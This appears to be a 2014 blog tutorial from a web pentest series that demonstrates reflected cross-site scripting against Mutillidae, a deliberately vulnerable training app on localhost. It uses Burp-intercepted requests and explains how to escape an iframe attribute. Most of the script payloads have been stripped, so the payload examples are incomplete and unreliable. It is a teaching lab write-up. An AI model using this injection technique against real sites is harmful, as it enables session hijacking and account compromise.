Friday, February 21, 2014

Web App Pentest - Part 5 XSS


In my previous article we have seen which are the different ways of fuzzing including suffix and prefix. We used those fuzzing techniques in order to find error messages in web application. Now as we know how to fuzz, we will use that skill to find XSS generally known as cross site scripting.

Testing For XSS

Without wasting much time, let us go to, Document viewer page under A3 Cross site scripting(XSS) module. In there are various method of exploiting XSS but first we will choose simple method which is HTTP attribute.




As soon as you open page, see what does it tell to you. In this case, we are provided four different types of options to see the documents on any web page. One of four is downloadable document from that web application and other 3 documents are showing in below box.



Let us keep it as it is and intercept the request after submitting document. Intercepted request is as follows:



GET /chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document

Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5

Connection: keep-alive



By checking into PARAM section, we can identify that PathToDocument is the main parameter from which we are able to see the original content of the text which is displayed into the box. So let us remove the value of that parameter and let us try to fuzz it with our skills. First of all I am removing whole red highlighted line form previous header. Now I will put first simple text ‘Jonnybravo’ in order to see if my request gets successfully processed or server is giving me an error. So I am just making change in first line of header which is as follows:



GET /chintan/index.php?page=document-viewer.php&PathToDocument=jonnybravo&document-viewer-php-submit-button=View+Document HTTP/1.1



Now after forwarding request I have got 200 OK responses from server and I have intercepted response as well in burp suite, so that I can see HTML coding of response page in order to find our input which is jonnybravo.



There are 2 matches which show my given input. So now I come to know that what to keep in mind while crafting an XSS exploit. First jonnybravo is just a text between quotes, but at another place we have iframe tag in which there is a src(Source) attribute and the value of that jonnybravo.



We can check here for XSS by crafting custom payload by arranging proper suffix and prefix in jonnybravo input. In order to test XSS we cannot execute our payload directly at this place in the middle of iframe. We have to break this tag and we can inject our payload somewhere outside before or after iframe tag. If we inject our payload somewhere out in iframe, then it will be lying in HTML code only so It will be executed unless and if some other security techniques are not used.



Show Time


Now here is our target.




First thing we need to do is to break the context. As you all are familiar with HTML. Here src=”jonnybravo” is there. So to break the context we need to give “jonnybravo as input. So that 1st “ of default code and 2nd “ of our input together works and it will assume that there is blank input from client side. So now our code is something like below.






Then as iframe tag has been started, we need to close it in order to give our payload injection outside the iframe. So then we will give closing tag in our input which is “jonnybravo. So now our new code is something like below.



" width="700px" height="500px">



As you can conclude from above line that iframe has been started and finished by our input now we are outside of the iframe tag and we can give our payload here. So we will try to inject javascript alert. So for that payload is . But it all comes after our given input. So our new and final input is as follows:



Payload :“jonnybravo
.


Now our new code(request) is as below.



width="700px" height="500px">



As you can see that iframe tag is closed before our payload gets executed and whatever written after my payload(height width and closing iframe tag) will not make any difference as HTML will only consider it as a normal code lying out there as that code is incomplete so it won’t be executed. So I gave all this input in the request which I intercepted so my new request is as follows.



GET /chintan/index.php?page=document-viewer.php&PathToDocument= “jonnybravo
&document-viewer-php-submit-button=View+Document HTTP/1.1
Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document

Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5

Connection: keep-alive

After forwarding this request, as I told you, our javascript alert payload will be executed outside of framework and it gave me alert in popup by saying ”momma”which was the input given by me.


To illustrate the work up to now, let us intercept the response of this request and let us check the coding where does momma is lying in the code.
  

From code, you can analyze that iframe tag is closed when we give
in our input and it started script tag from the next line so that script tag was our another input which we gave it together. It is not mandatory that you need to give “ first followed by jonnybravo. You can also craft a payload as follow.

Payload :Jonnybravo”

 If I give above payload I get response like below figure.




Here it will execute the javascript along with the iframe as well. First when it executes our payload you won’t be able to see the iframe box, but as soon as you click on “ok”button, and when the complete page gets load you will able to see the iframe box as shown in below figure.



To verify that it is an iframe box, I have pressed F12 to see the runtime coding of the page and I am using inspect element option provided by the firebug, it is not actually a firebug add-on but it is inbuilt version of Firefox which I am using. It shows that I am inspecting one element and by watching at html code it can  be confirmed that it is my jonnybravo iframe source.



“It depends on your html skills and the basic knowledge of encoding and decoding of special characters. If you know that in depth you can bypass the filters, however OWASP is providing XSS filter cheetsheet which is available on their official website in case you need. It explains encoding and decoding techniques along with the filter bypassing techniques.”



Use Burp Decoder
Many times URL you might see, will not be so much easy to understand and recognize by looking into that. It might be encoded server might be using encoding techniques for at least special characters. In such situation if you cannot understand URL, simply put that into the burp decoder.


How-To

Encoded URL

http:%2f %2flocalhost%2Fchintan%2findex.php%3fpage%3ddocument%2dviewer.php%26PathToDocument%3ddocumentation%2Fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork.php%26document%2dviewer%2dphp%2dsubmit%2dbutton=View+Document 

Let us assume that we are having this URL which is in encoded form and we are not able to understand what does it tell. Simply copy and paste this URL in burp decoder and click on “Smart Decode” if burp knows the decoding method it will decode the URL. I have decoded this URL and the simplified form of this URL is as follows:



Decoded URL:



In the burp it will look like as follows:

 

Conclusion


So this is how cross site scripting attack also known as XSS is hatted by attackers to the web application. This attack is used to bypass the access controls. It varies from the nature of the security which is implemented by the web application developer. XSS also depends on the behavior of the input data which is being handled by the web application.

References
http://www.maximumpc.com/files/u21826/teaser_xss.png

No comments: